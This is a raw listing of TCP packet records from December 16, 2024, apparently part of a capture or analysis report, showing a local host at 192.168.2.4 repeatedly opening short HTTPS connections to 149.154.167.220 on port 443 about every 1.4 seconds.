Dec 16, 2024 14:16:14.393850088 CET	443	49947	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:14.393970013 CET	49947	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:14.394563913 CET	49947	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:14.399000883 CET	49953	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:14.399060965 CET	443	49953	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:14.399396896 CET	49953	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:14.399921894 CET	49953	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:14.399936914 CET	443	49953	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:15.760489941 CET	443	49953	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:15.763050079 CET	49953	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:15.763081074 CET	443	49953	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:15.763161898 CET	49953	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:15.763166904 CET	443	49953	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:16.330467939 CET	443	49953	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:16.330560923 CET	443	49953	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:16.330725908 CET	49953	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:16.332545042 CET	49953	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:16.334906101 CET	49959	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:16.334971905 CET	443	49959	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:16.335068941 CET	49959	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:16.335372925 CET	49959	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:16.335393906 CET	443	49959	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:17.702537060 CET	443	49959	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:17.705085993 CET	49959	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:17.705123901 CET	443	49959	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:17.705168962 CET	49959	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:17.705178022 CET	443	49959	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:18.424246073 CET	443	49959	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:18.424334049 CET	443	49959	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:18.424638987 CET	49959	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:18.427577972 CET	49959	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:18.429563046 CET	49962	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:18.429611921 CET	443	49962	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:18.433007002 CET	49962	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:18.433007002 CET	49962	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:18.433063030 CET	443	49962	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:19.814784050 CET	443	49962	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:19.816970110 CET	49962	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:19.816984892 CET	443	49962	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:19.817104101 CET	49962	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:19.817111969 CET	443	49962	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:20.368932009 CET	443	49962	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:20.369023085 CET	443	49962	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:20.370783091 CET	49962	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:20.371121883 CET	49962	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:20.374749899 CET	49968	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:20.374789000 CET	443	49968	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:20.375040054 CET	49968	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:20.375286102 CET	49968	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:20.375297070 CET	443	49968	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:21.753645897 CET	443	49968	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:21.758203030 CET	49968	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:21.758234978 CET	443	49968	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:21.758367062 CET	49968	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:21.758378029 CET	443	49968	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:22.379966974 CET	443	49968	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:22.380109072 CET	443	49968	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:22.380211115 CET	49968	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:22.380907059 CET	49968	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:22.389682055 CET	49974	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:22.389728069 CET	443	49974	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:22.389951944 CET	49974	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:22.390346050 CET	49974	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:22.390362978 CET	443	49974	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:23.751848936 CET	443	49974	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:23.772047997 CET	49974	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:23.772147894 CET	443	49974	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:23.772372961 CET	443	49974	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:23.772423029 CET	49974	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:23.772959948 CET	49974	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:23.775628090 CET	49980	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:23.775685072 CET	443	49980	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:23.775897980 CET	49980	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:23.776190996 CET	49980	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:23.776201963 CET	443	49980	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:25.143471003 CET	443	49980	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:25.143547058 CET	49980	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:25.146712065 CET	49980	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:25.146723986 CET	443	49980	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:25.146986008 CET	443	49980	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:25.148895025 CET	49980	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:25.148937941 CET	443	49980	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:25.149065971 CET	443	49980	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:25.149123907 CET	49980	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:25.149147034 CET	49980	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:25.152134895 CET	49984	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:25.152182102 CET	443	49984	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:25.152355909 CET	49984	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:25.152591944 CET	49984	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:25.152607918 CET	443	49984	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:26.531181097 CET	443	49984	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:26.531261921 CET	49984	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:26.533535957 CET	49984	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:26.533546925 CET	443	49984	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:26.533833981 CET	443	49984	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:26.535784006 CET	49984	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:26.535830975 CET	443	49984	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:26.535887957 CET	49984	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:26.540003061 CET	49987	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:26.540049076 CET	443	49987	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:26.540132046 CET	49987	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:26.540394068 CET	49987	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:26.540409088 CET	443	49987	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:27.917469025 CET	443	49987	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:27.917583942 CET	49987	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:27.919390917 CET	49987	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:27.919411898 CET	443	49987	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:27.919681072 CET	443	49987	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:27.922416925 CET	49987	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:27.922475100 CET	443	49987	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:27.922630072 CET	443	49987	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:27.922682047 CET	49987	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:27.922715902 CET	49987	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:27.925978899 CET	49991	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:27.926023960 CET	443	49991	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:27.926100016 CET	49991	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:27.926662922 CET	49991	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:27.926676989 CET	443	49991	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:29.294073105 CET	443	49991	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:29.294188023 CET	49991	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:29.296202898 CET	49991	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:29.296216011 CET	443	49991	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:29.296489000 CET	443	49991	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:29.298624039 CET	49991	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:29.298675060 CET	443	49991	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:29.298734903 CET	49991	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:29.302310944 CET	49994	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:29.302377939 CET	443	49994	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:29.302563906 CET	49994	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:29.302983046 CET	49994	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:29.302999973 CET	443	49994	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:30.681668997 CET	443	49994	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:30.681857109 CET	49994	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:30.683538914 CET	49994	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:30.683563948 CET	443	49994	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:30.683891058 CET	443	49994	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:30.685731888 CET	49994	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:30.685794115 CET	443	49994	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:30.685868025 CET	49994	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:30.689141989 CET	50000	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:30.689182997 CET	443	50000	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:30.689260960 CET	50000	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:30.689491034 CET	50000	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:30.689505100 CET	443	50000	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:32.053062916 CET	443	50000	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:32.053241968 CET	50000	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:32.054861069 CET	50000	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:32.054868937 CET	443	50000	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:32.055136919 CET	443	50000	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:32.057116032 CET	50000	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:32.057161093 CET	443	50000	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:32.057298899 CET	50000	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:32.060959101 CET	50004	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:32.061011076 CET	443	50004	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:32.061150074 CET	50004	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:32.061352015 CET	50004	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:32.061367035 CET	443	50004	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:33.424345016 CET	443	50004	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:33.424441099 CET	50004	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:33.426855087 CET	50004	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:33.426870108 CET	443	50004	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:33.427109957 CET	443	50004	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:33.430248976 CET	50004	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:33.430289030 CET	443	50004	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:33.430357933 CET	50004	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:33.436372995 CET	50007	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:33.436420918 CET	443	50007	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:33.436528921 CET	50007	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:33.436893940 CET	50007	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:33.436913013 CET	443	50007	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:34.816315889 CET	443	50007	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:34.816405058 CET	50007	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:34.818600893 CET	50007	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:34.818624973 CET	443	50007	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:34.818931103 CET	443	50007	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:34.820723057 CET	50007	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:34.820805073 CET	443	50007	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:34.820898056 CET	50007	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:34.963351011 CET	50013	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:34.963408947 CET	443	50013	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:34.963484049 CET	50013	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:34.963860989 CET	50013	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:34.963874102 CET	443	50013	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:36.325887918 CET	443	50013	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:36.325954914 CET	50013	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:36.327786922 CET	50013	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:36.327800989 CET	443	50013	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:36.328044891 CET	443	50013	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:36.333029985 CET	50013	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:36.333075047 CET	443	50013	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:36.333132029 CET	50013	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:36.415950060 CET	50016	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:36.415992975 CET	443	50016	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:36.416070938 CET	50016	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:36.416321039 CET	50016	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:36.416327000 CET	443	50016	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:37.777793884 CET	443	50016	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:37.777879000 CET	50016	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:37.779565096 CET	50016	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:37.779580116 CET	443	50016	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:37.779815912 CET	443	50016	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:37.785126925 CET	50016	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:37.785166979 CET	443	50016	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:37.785248995 CET	50016	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:37.788940907 CET	50020	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:37.788978100 CET	443	50020	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:37.789117098 CET	50020	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:37.789597988 CET	50020	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:37.789609909 CET	443	50020	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:39.151113987 CET	443	50020	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:39.151330948 CET	50020	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:39.152894020 CET	50020	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:39.152904034 CET	443	50020	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:39.153136015 CET	443	50020	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:39.155585051 CET	50020	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:39.155618906 CET	443	50020	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:39.155668974 CET	50020	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:39.158724070 CET	50026	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:39.158775091 CET	443	50026	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:39.158973932 CET	50026	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:39.159235001 CET	50026	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:39.159248114 CET	443	50026	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:40.523875952 CET	443	50026	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:40.523983002 CET	50026	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:40.526365042 CET	50026	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:40.526372910 CET	443	50026	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:40.526623964 CET	443	50026	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:40.529000998 CET	50026	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:40.529051065 CET	443	50026	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:40.529109955 CET	50026	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:40.540446043 CET	50029	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:40.540479898 CET	443	50029	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:40.540556908 CET	50029	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:40.540914059 CET	50029	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:40.540929079 CET	443	50029	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:41.921302080 CET	443	50029	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:41.921389103 CET	50029	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:41.923628092 CET	50029	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:41.923640966 CET	443	50029	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:41.923921108 CET	443	50029	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:41.925985098 CET	50029	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:41.926031113 CET	443	50029	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:41.926085949 CET	50029	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:41.929394960 CET	50033	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:41.929444075 CET	443	50033	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:41.929596901 CET	50033	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:41.929843903 CET	50033	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:41.929862022 CET	443	50033	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:43.314584970 CET	443	50033	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:43.314730883 CET	50033	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:43.316884995 CET	50033	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:43.316899061 CET	443	50033	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:43.317831039 CET	443	50033	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:43.319823027 CET	50033	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:43.319866896 CET	443	50033	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:43.320004940 CET	443	50033	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:43.320025921 CET	50033	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:43.320059061 CET	50033	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:43.323096991 CET	50039	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:43.323134899 CET	443	50039	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:43.323338032 CET	50039	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:43.323857069 CET	50039	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:43.323869944 CET	443	50039	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:44.721385002 CET	443	50039	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:44.721637011 CET	50039	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:44.724481106 CET	50039	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:44.724493980 CET	443	50039	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:44.724761963 CET	443	50039	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:44.726747036 CET	50039	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:44.726789951 CET	443	50039	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:44.726933956 CET	443	50039	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:44.727256060 CET	50039	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:44.727256060 CET	50039	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:44.730536938 CET	50040	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:44.730592012 CET	443	50040	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:44.730670929 CET	50040	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:44.730900049 CET	50040	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:44.730916023 CET	443	50040	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:46.118056059 CET	443	50040	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:46.118160009 CET	50040	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:46.120018005 CET	50040	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:46.120038033 CET	443	50040	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:46.120383024 CET	443	50040	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:46.122723103 CET	50040	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:46.122786045 CET	443	50040	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:46.122845888 CET	50040	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:46.126374960 CET	50046	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:46.126419067 CET	443	50046	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:46.126488924 CET	50046	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:46.126727104 CET	50046	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:46.126741886 CET	443	50046	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:47.493787050 CET	443	50046	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:47.493880987 CET	50046	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:47.496220112 CET	50046	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:47.496233940 CET	443	50046	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:47.496494055 CET	443	50046	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:47.498394966 CET	50046	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:47.498445988 CET	443	50046	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:47.498570919 CET	443	50046	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:47.498646021 CET	50046	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:47.498675108 CET	50046	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:47.501816988 CET	50049	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:47.501868010 CET	443	50049	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:47.502010107 CET	50049	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:47.502216101 CET	50049	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:47.502224922 CET	443	50049	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:48.879411936 CET	443	50049	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:48.879501104 CET	50049	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:48.881187916 CET	50049	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:48.881205082 CET	443	50049	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:48.881462097 CET	443	50049	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:48.883589983 CET	50049	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:48.883641958 CET	443	50049	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:48.883793116 CET	50049	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:48.887180090 CET	50053	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:48.887219906 CET	443	50053	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:48.887357950 CET	50053	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:48.887655020 CET	50053	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:48.887676001 CET	443	50053	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:50.257791042 CET	443	50053	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:50.257883072 CET	50053	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:50.259732962 CET	50053	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:50.259746075 CET	443	50053	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:50.260163069 CET	443	50053	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:50.263688087 CET	50053	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:50.263901949 CET	443	50053	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:50.264003992 CET	50053	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:50.267697096 CET	50058	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:50.267806053 CET	443	50058	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:50.267893076 CET	50058	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:50.268284082 CET	50058	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:50.268321991 CET	443	50058	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:51.646634102 CET	443	50058	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:51.646775961 CET	50058	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:51.648578882 CET	50058	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:51.648593903 CET	443	50058	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:51.649271965 CET	443	50058	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:51.651016951 CET	50058	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:51.651067019 CET	443	50058	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:51.651144981 CET	50058	443	192.168.2.4	149.154.167.220
